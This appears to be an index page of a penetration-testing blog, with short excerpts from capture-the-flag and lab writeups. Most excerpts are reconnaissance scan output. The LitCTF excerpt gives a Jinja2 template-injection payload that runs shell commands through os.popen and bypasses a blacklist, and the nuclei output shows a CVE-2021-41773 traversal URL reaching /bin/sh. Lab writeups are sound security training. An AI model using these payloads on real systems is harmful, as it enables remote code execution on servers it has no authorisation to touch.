Posts on HYH's Blog

HTB-Facts

Wed, 04 Feb 2026 00:00:00 +0000

the writeup of facts in hackthebox

HTB-Expressway

Sun, 28 Sep 2025 00:00:00 +0000

the writeup of expressway in hackthebox

HTB-HackNeT

Tue, 16 Sep 2025 00:00:00 +0000

the writeup of hacknet in hackthebox

HTB-Soulmate

Wed, 10 Sep 2025 00:00:00 +0000

the writeup of soulmate in hackthebox, linux , CrashFTP, Erlang

HackMyVM-Silentdev

Fri, 05 Sep 2025 00:00:00 +0000

the writeup of silentdev in Hackmyvm

vulntarget-a

Thu, 04 Sep 2025 00:00:00 +0000

the writeup of vulntarget-a

vulntarget-c

Wed, 03 Sep 2025 00:00:00 +0000

the writeup of vulntarget-c , Laravel, PDB, Fscan, MobaXterm

HTB-Guardian

Tue, 02 Sep 2025 00:00:00 +0000

the writeup of guardian in hackthebox

Thehackerslabs-Folclore

Tue, 02 Sep 2025 00:00:00 +0000

the writeup of Folclore in thehackerslabs

Matrix-Breakout-2-Morpheus (New)

Sat, 30 Aug 2025 00:00:00 +0000

the writeup of Matrix-Breakout-2-Morpheus in Vulnhub

Thehackerslabs-Patata Mágica

Sat, 30 Aug 2025 00:00:00 +0000

the writeup of Patata Mágica in thehackerslabs

HTB-Previous

Thu, 28 Aug 2025 00:00:00 +0000

the writeup of previous in hackthebox

Thehackerslabs-Welcome To The Jungle

Sat, 23 Aug 2025 00:00:00 +0000

the writeup of Welcome To The Jungle in thehackerslabs

Thehackerslabs-Evelator

Fri, 22 Aug 2025 00:00:00 +0000

the writeup of Evelator in Thehackerslabs, Active Directory.

HTB-CodeTwo

Thu, 21 Aug 2025 00:00:00 +0000

the writeup of codetwo in hackthebox

Thehackerslabs-Pa Que Aiga Lujo

Thu, 21 Aug 2025 00:00:00 +0000

the writeup of Pa Que Aiga Lujo in thehackerslabs.

HackMyVM-Lazzycorp

Tue, 19 Aug 2025 00:00:00 +0000

the writeup of lazzycorp in hackmyvm.

HTB-Editor

Sat, 09 Aug 2025 00:00:00 +0000

the writeup of editor in hackthebox

HTB-Era

Tue, 05 Aug 2025 00:00:00 +0000

the writeup of Era in hackthebox

HackMyVM-Takedown

Thu, 31 Jul 2025 00:00:00 +0000

the writeup of Takedown in hackmyvm, SSTI, RSA

Cyberstrikelab-SweetCake

Mon, 28 Jul 2025 00:00:00 +0000

the writeup of Sweetcake in cyberstrikelab, Struts2, 积木报表, 通达OA, Xshell, MS17-010

Cyberstrikelab-TengSnake

Sun, 27 Jul 2025 00:00:00 +0000

the writeup of Tengsnake in cyberstrikelab, EmpireCMS,PHPCMS,DuomiCMS,Mysql,zerologon,IPC, pass the hash

Cyberstrikelab-Thunder

Wed, 23 Jul 2025 00:00:00 +0000

the writeup of Thunder in cyberstrikelab, thinkphp rce,Mysql UDF Bypasss, Z-Blog, XXE

Cyberstrikelab-Lab9

Tue, 22 Jul 2025 00:00:00 +0000

the writeup of lab9 in cyberstrikelab, CMSeasy, SMB, ADCS

Cyberstrikelab-Lab7

Mon, 21 Jul 2025 00:00:00 +0000

the writeup of lab7 in cyberstrikelab, bagecms ,ms17-010, pass the hash

Cyberstrikelab-Lab8

Mon, 21 Jul 2025 00:00:00 +0000

the writeup of lab8 in cyberstrikelab, ZZZCMS,RDP, evasion, 非约束委派

Cyberstrikelab-Lab5

Sun, 20 Jul 2025 00:00:00 +0000

the writeup of lab5 in cyberstrikelab, BEEES CMS,zerologon,pass the hash,jboss, zerologon

Cyberstrikelab-Lab6

Sun, 20 Jul 2025 00:00:00 +0000

the writeup of lab6 in cyberstrikelab, joomla ,ms17-010, weblogic

Cyberstrikelab-Lab4

Sat, 19 Jul 2025 00:00:00 +0000

the writeup of lab4 in cyberstrikelab, Bluecms,zerologon,pass the hash

Cyberstrikelab-Lab3

Fri, 18 Jul 2025 00:00:00 +0000

the writeup of lab3 in cyberstrikelab,taocms,backdoor php, cve-2020-1472, dcsync

Cyberstrikelab-Lab1

Thu, 17 Jul 2025 00:00:00 +0000

the writeup of lab1 in cyberstrikelab, thinkphp rce,ms17-010, pass the hash

Cyberstrikelab-Lab2

Thu, 17 Jul 2025 00:00:00 +0000

the writeup of lab2 in cyberstrikelab, 74cms getshell,ms17-010

HTB-Outbound

Mon, 14 Jul 2025 00:00:00 +0000

the writeup of outbound in hackthebox, nuclei ,CVE-2025-49113, 3DES,CVE-2025-27591, below.

HTB-Voleur

Thu, 10 Jul 2025 00:00:00 +0000

writeup of voleur in hackthebox, targetedkerberoast, restore user , dpapi , secretsdump, ssh

HTB-RustyKey

Tue, 01 Jul 2025 00:00:00 +0000

writeup of rustykey in hackthebox, kerberos, timeroasting, COM hijack, DCsync, RunasCs

Dockerlabs-Status

Thu, 26 Jun 2025 00:00:00 +0000

writeup of status in Dockerlabs.es, unzip, ssrf, php filter chains, include

Dockerlabs-Bola

Tue, 24 Jun 2025 00:00:00 +0000

writeup of Bola in Dockerlabs.es, unzip , hydra

HTB-Artificial

Mon, 23 Jun 2025 00:00:00 +0000

writeup of Artificial in hackthebox, TensorFlow RCE, restic

HackMyVM-Sabulaji

Fri, 13 Jun 2025 00:00:00 +0000

writeup of sabulaji in hackmyvm.eu

HTB-TombWatcher

Fri, 13 Jun 2025 00:00:00 +0000

writeup of tombwatcher in hackthebox. ESC15, Active Directory.

HTB-Certificate

Sun, 08 Jun 2025 00:00:00 +0000

writeup of certificate in hackthebox

Dockerlabs-ApacheByte

Fri, 06 Jun 2025 00:00:00 +0000

writeup of ApacheByte in Dockerlabs.es

Thehackerslabs-Merchan

Thu, 05 Jun 2025 00:00:00 +0000

writeup of Merchan in Thehackerslabs

Dockerlabs-Ofuskeit

Wed, 04 Jun 2025 00:00:00 +0000

Box Info

OS	Difficulty
Linux	Medium

Nmap

[root@kali] /home/kali/ofuskeit  
❯ nmap 172.17.0.2 -sV -A -p-   

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey: 
|   256 f4:1e:4f:80:e4:25:19:87:a5:2b:e5:fe:b3:16:5d:70 (ECDSA)
|_  256 7d:5a:d8:80:54:05:d2:2f:6f:7f:59:26:4f:6f:83:a8 (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Servicios de Mantenimiento Inform\xC3\xA1tico
3000/tcp open  http    Node.js Express framework
|_http-title: Error

Dirsearch

[root@kali] /home/kali/ofuskeit  
❯ dirsearch -u http://172.17.0.2      

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                                         
                                                                                                                                                
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://172.17.0.2/

[22:47:24] Scanning:                                                                                                                            
[22:47:24] 200 -   318B - /.git                                             
[22:47:31] 200 -    2KB - /index.html                                       
[22:47:31] 301 -   313B - /javascript  ->  http://172.17.0.2/javascript/    
[22:47:33] 301 -   315B - /node_modules  ->  http://172.17.0.2/node_modules/
[22:47:33] 200 -   14KB - /node_modules/                                    
[22:47:33] 200 -   26KB - /package-lock.json                                
[22:47:33] 200 -   265B - /package.json
[22:47:34] 403 -   275B - /server-status                                    
[22:47:34] 403 -   275B - /server-status/                                   
                                                                             
Task Completed

查看.git目录，得到一个用户的信息

HackMyVM-Umz

Wed, 04 Jun 2025 00:00:00 +0000

Box Info

OS	Difficulty
Linux	Easy

Nmap

[root@kali] /home/kali/Umz  
❯ nmap 192.168.55.73 -sV -A -p-                                                                                                            
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: cyber fortress 9000
|_http-server-header: Apache/2.4.62 (Debian)

Dirsearch

[root@kali] /home/kali/Umz  
❯ dirsearch -u http://192.168.55.73                                      

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                                         
                                                                                                                                                
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://192.168.55.73/

[02:39:29] Scanning:                                                                                                                            
[02:39:30] 403 -   278B - /.php                                             
[02:39:38] 200 -    3KB - /index.html                                       
[02:39:38] 200 -    3KB - /index.php                                        
[02:39:38] 200 -    3KB - /index.php/login/                                 
[02:39:43] 403 -   278B - /server-status/                                   
[02:39:43] 403 -   278B - /server-status
                                                                             
Task Completed

Request Flood

来到index.php，可以看到过多请求会触发某种机制

Thehackerslabs-Hexthink-Silent-Shadow

Wed, 04 Jun 2025 00:00:00 +0000

Nmap

[root@kali] /home/kali/hexthink-silent-shadow  
❯ nmap 192.168.55.67 -sV -A -p-                                                                                                            
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4d:6e:39:a4:15:86:88:70:c7:9d:09:91:a3:0b:18:8c (ECDSA)
|_  256 f9:21:5d:25:ee:76:05:db:01:3b:45:c9:68:b0:82:9f (ED25519)
80/tcp   open  http        Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.58 (Ubuntu)
3306/tcp open  mysql       MariaDB 5.5.5-10.11.11
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.11.11-MariaDB-0ubuntu0.24.04.2
|   Thread ID: 34
|   Capabilities flags: 63486
|   Some Capabilities: LongColumnFlag, Support41Auth, Speaks41ProtocolOld, SupportsCompression, IgnoreSigpipes, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, InteractiveClient, FoundRows, ODBCClient, ConnectWithDatabase, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, SupportsTransactions, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: wPg7y~-c,O)~bPI]yfu:
|_  Auth Plugin Name: mysql_native_password
9090/tcp open  zeus-admin?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, SqueezeCenter_CLI, TLSSessionReq, TerminalServerCookie, WMSRequest, X11Probe, drda, ibm-db2-das, informix: 
|_    Protocolo incorrecto. Esto no es HTTP.

Mysql

进入到80端口的index.php，查看到存在ctf_user用户，可以使用密码登录，尝试使用空密码登录呢

Dockerlabs-Bypassme

Sat, 31 May 2025 00:00:00 +0000

Box Info

OS	Difficulty
Linux	Easy

Nmap

[root@kali] /home/kali/bypassme  
❯ nmap 172.17.0.2 -sV -A -p- 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 b4:a8:42:e7:2b:2f:7a:f9:50:bd:6d:31:8e:36:54:7b (ECDSA)
|_  256 c0:ff:28:31:a3:0b:1a:3d:c3:5f:83:1b:3c:44:28:32 (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-title: Login Panel
|_Requested resource was login.php
|_http-server-header: Apache/2.4.58 (Ubuntu)

Dirsearch

[root@kali] /home/kali/bypassme  
❯ dirsearch -u 172.17.0.2                     

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                                         
                                                                                                                                                
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://172.17.0.2/

[10:03:10] Scanning:                                                                                                                            
[10:03:11] 403 -   275B - /.php                                             
[10:03:18] 302 -     0B - /index.php  ->  login.php                         
[10:03:18] 302 -     0B - /index.php/login/  ->  login.php                  
[10:03:18] 200 -    2KB - /login.php                                        
[10:03:18] 403 -   275B - /logs                                             
[10:03:18] 403 -   275B - /logs/access_log                                  
[10:03:18] 403 -   275B - /logs/                                            
[10:03:18] 403 -   275B - /logs/access.log                                  
[10:03:18] 403 -   275B - /logs/error.log
[10:03:18] 403 -   275B - /logs/error_log
[10:03:18] 403 -   275B - /logs/liferay.log
[10:03:18] 403 -   275B - /logs/mail.log
[10:03:18] 403 -   275B - /logs/proxy_error_log
[10:03:18] 403 -   275B - /logs/proxy_access_ssl_log
[10:03:18] 403 -   275B - /logs/wsadmin.traceout
[10:03:18] 403 -   275B - /logs/errors.log
[10:03:18] 403 -   275B - /logs/www-error.log
[10:03:21] 403 -   275B - /server-status/                                   
[10:03:21] 403 -   275B - /server-status                                    
                                                                             
Task Completed

发现存在一个/logs目录，但是无法直接查看，还是来到登陆页面查看

Dockerlabs-Pkgpoison

Sat, 31 May 2025 00:00:00 +0000

Box Info

OS	Difficulty
Linux	Easy

Nmap

[root@kali] /home/kali/pkgpoison  
❯ nmap 172.17.0.2 -sV -A -p-                                                        
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 03:57 EDT
Nmap scan report for 172.17.0.2
Host is up (0.000057s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 2f:87:50:66:15:23:d6:c3:90:3f:ea:8c:a4:4b:b3:ff (RSA)
|   256 d1:35:c1:82:09:e8:c2:c7:cd:98:89:61:c2:6b:14:64 (ECDSA)
|_  256 dd:01:45:ce:bd:a3:05:21:5b:31:4c:2f:df:38:c4:f6 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: 404 Not Found
|_http-server-header: Apache/2.4.41 (Ubuntu)

Feroxbuster

[root@kali] /home/kali/pkgpoison  
❯ feroxbuster -u 'http://172.17.0.2/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x php,txt   
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://172.17.0.2/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, txt]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      272c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      308c http://172.17.0.2/notes => http://172.17.0.2/notes/
200      GET        5l       24w      177c http://172.17.0.2/notes/note.txt
200      GET     5094l    30782w  2832734c http://172.17.0.2/index.png
200      GET       26l       51w      589c http://172.17.0.2/
[####################] - 17s   661647/661647  0s      found:4       errors:3422   
[####################] - 16s   661638/661638  40447/s http://172.17.0.2/ 
[####################] - 0s    661638/661638  330819000/s http://172.17.0.2/notes/ => Directory listing (add --scan-dir-listings to scan)

查看到一个note.txt

VulnVM-Ghoster

Sat, 31 May 2025 00:00:00 +0000

Box Info

OS	Difficulty
Linux	Medium

Nmap

[root@kali] /home/kali/ghoster  
❯ nmap 192.168.55.65 -sV -A -p-                                                                                                              
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey: 
|   256 c5:5f:01:14:c9:d4:fe:8e:9c:01:5f:3a:2c:dd:38:64 (ECDSA)
|_  256 63:25:3e:2b:61:4f:21:86:fa:d9:e5:d5:b6:bd:e8:29 (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)
8081/tcp open  http    Werkzeug httpd 3.1.3 (Python 3.11.2)
|_http-title: Document Submission Portal
|_http-server-header: Werkzeug/3.1.3 Python/3.11.2

Gobuster

[root@kali] /home/kali/ghoster  
❯ gobuster dir -u 'http://192.168.55.65/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt   -x php                            ⏎
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.55.65/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 278]
/uploads              (Status: 301) [Size: 316] [--> http://192.168.55.65/uploads/]
/.php                 (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
Progress: 441120 / 441122 (100.00%)
===============================================================
Finished
===============================================================

CVE-2023-36664

没有什么可以直接利用的，来到8081端口

VulnVM-Manage

Sat, 31 May 2025 00:00:00 +0000

Box Info

OS	Difficulty
Linux	Easy

Nmap

[root@kali] /home/kali/manage  
❯ nmap 192.168.55.66 -sV -A -p-

PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)
139/tcp open  netbios-ssn Samba smbd 4
445/tcp open  netbios-ssn Samba smbd 4
MAC Address: 08:00:27:01:D6:2B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

Dirsearch

[root@kali] /home/kali/manage  
❯ dirsearch -u 'http://192.168.55.66'                                                                                                         ⏎

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                                         
                                                                                                                                                
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://192.168.55.66/

[23:33:52] Scanning:                                                                                                                            
[23:33:53] 403 -   278B - /.php                                             
[23:33:55] 200 -   11KB - /admin.php                                        
[23:34:01] 200 -   10KB - /index.html                                       
[23:34:05] 403 -   278B - /server-status/                                   
[23:34:05] 403 -   278B - /server-status                                    
                                                                             
Task Completed

好像不存在SQL注入问题，也无法爆破登录，现在来看看445端口

VulNyx-Build

Sat, 31 May 2025 00:00:00 +0000

Box Info

OS	Difficulty
Windows	Low

Nmap

[root@kali] /home/kali  
❯ nmap 192.168.55.68 -sV -A -p-                                                                                                               
Not shown: 65523 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
8080/tcp  open  http          Jetty 12.0.19
|_http-server-header: Jetty(12.0.19)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry 
|_/
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:9C:A2:BB (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Microsoft Windows 10
OS CPE: cpe:/o:microsoft:windows_10
OS details: Microsoft Windows 10 1709 - 21H2
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 14h59m58s
| smb2-time: 
|   date: 2025-06-01T03:03:58
|_  start_date: N/A
|_nbstat: NetBIOS name: BUILD, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:9c:a2:bb (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Jenkins RCE

来到8080端口，默认的用户凭证就是admin/admin

Dockerlabs-LogisticCloud

Fri, 30 May 2025 00:00:00 +0000

靶机：LogisticCloud；扫描端口，利用MinIO存储爆破Excel密码获取用户登录，导出KeePass数据库爆破获得root权限。

Dockerlabs-Thedog

Fri, 30 May 2025 00:00:00 +0000

NMAP

[root@kali] /home/kali/thedog  
❯ nmap 172.17.0.2 -sV -A -p-   

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.49 ((Unix))
|_http-title: Comando Ping
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.49 (Unix)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

Nuclei

[root@kali] /home/kali/thedog  
❯ nuclei -u http://172.17.0.2                                                                                                                 ⏎

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.2

                projectdiscovery.io

[INF] Current nuclei version: v3.4.2 (outdated)
[INF] Current nuclei-templates version: v10.2.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 65
[INF] Templates loaded for current scan: 7991
[INF] Executing 7793 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 198 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1743 (Reduced 1638 Requests)
[INF] Using Interactsh Server: oast.me
[CVE-2021-41773:RCE] [http] [high] http://172.17.0.2/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
[http-trace:trace-request] [http] [info] http://172.17.0.2
[http-trace:options-request] [http] [info] http://172.17.0.2
[missing-sri] [http] [info] http://172.17.0.2 ["https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css"]
[waf-detect:apachegeneric] [http] [info] http://172.17.0.2
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:content-security-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://172.17.0.2
[http-missing-security-headers:referrer-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:strict-transport-security] [http] [info] http://172.17.0.2
[http-missing-security-headers:permissions-policy] [http] [info] http://172.17.0.2
[http-missing-security-headers:x-frame-options] [http] [info] http://172.17.0.2
[http-missing-security-headers:x-content-type-options] [http] [info] http://172.17.0.2
[http-missing-security-headers:clear-site-data] [http] [info] http://172.17.0.2
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://172.17.0.2
[tech-detect:jsdelivr] [http] [info] http://172.17.0.2
[tech-detect:bootstrap] [http] [info] http://172.17.0.2
[apache-detect] [http] [info] http://172.17.0.2 ["Apache/2.4.49 (Unix)"]
[options-method] [http] [info] http://172.17.0.2 ["GET,POST,OPTIONS,HEAD,TRACE"]

CVE-2021-41773

经过信息收集，得到以下命令执行的方式

HTB-Fluffy

Thu, 29 May 2025 00:00:00 +0000

Box Info

OS	Difficulty
Windows	Easy

As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!

Nmap

[root@kali] /home/kali/Fluffy  
❯ nmap Fluffy.htb -sV -T4                                                                                           

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos 
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

添加dc01.fluffy.htb到/etc/host

HTB-Puppy

Wed, 28 May 2025 00:00:00 +0000

Box Info

OS	Difficult
Windows	Medium

As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!

Nmap

[root@kali] /home/kali/Puppy  
❯ nmap puppy.htb -sV   

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos 
111/tcp  open  rpcbind       2-4 (RPC #100000)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2049/tcp open  nlockmgr      1-4 (RPC #100021)
3260/tcp open  iscsi?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

RPC

[root@kali] /home/kali/Puppy  
❯ rpcclient 10.xx.xx.xx -U levi.james                                                                                                         ⏎
Password for [WORKGROUP\levi.james]:
rpcclient $> enumdomusers 
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[levi.james] rid:[0x44f]
user:[ant.edwards] rid:[0x450]
user:[adam.silver] rid:[0x451]
user:[jamie.williams] rid:[0x452]
user:[steph.cooper] rid:[0x453]
user:[steph.cooper_adm] rid:[0x457]
rpcclient $>

得到一个用户列表

LitCTF-2025

Mon, 26 May 2025 00:00:00 +0000

LITCTF2025

Web

星愿信箱

经过测试是SSTI，可以通过设置变量绕过黑名单

{% set os = (lipsum | attr('__globals__')) | attr('get')('os') %}
{% set popen = os | attr('popen') %}
{% set input_cmd = "head /flag" %}
{% set cmd = popen(input_cmd).read() %}
{% print cmd %}

nest_js

弱密码，登录就有flag

HackMyVM-Homelab

Sat, 17 May 2025 00:00:00 +0000

Box Info

OS	Linux
Difficulty	Medium

Nmap

[root@kali] /home/kali/homelab  
❯ nmap 192.168.55.41 -sV -A -p- 

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.62 ((Unix))
|_http-favicon: Apache on Mac OS X
|_http-title: Mac OS X Server
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.62 (Unix)

只有80端口开放了

Dir Fuzz

[root@kali] /home/kali/homelab  
❯ dirsearch -u http://192.168.55.41  

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                                         
                                                                                                                                                
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://192.168.55.41/

[04:47:54] Scanning:                                                                                                                            
[04:48:00] 200 - 820B - /cgi-bin/printenv                                 
[04:48:00] 200 - 1KB - /cgi-bin/test-cgi                                 
[04:48:01] 200 - 4KB - /error.html                                       
[04:48:01] 200 - 8KB - /favicon.ico                                      
[04:48:02] 200 - 5KB - /index.html                                       
[04:48:05] 301 - 313B - /script  ->  http://192.168.55.41/script/         
[04:48:05] 403 - 276B - /script/
[04:48:06] 301 - 314B - /service  ->  http://192.168.55.41/service/       
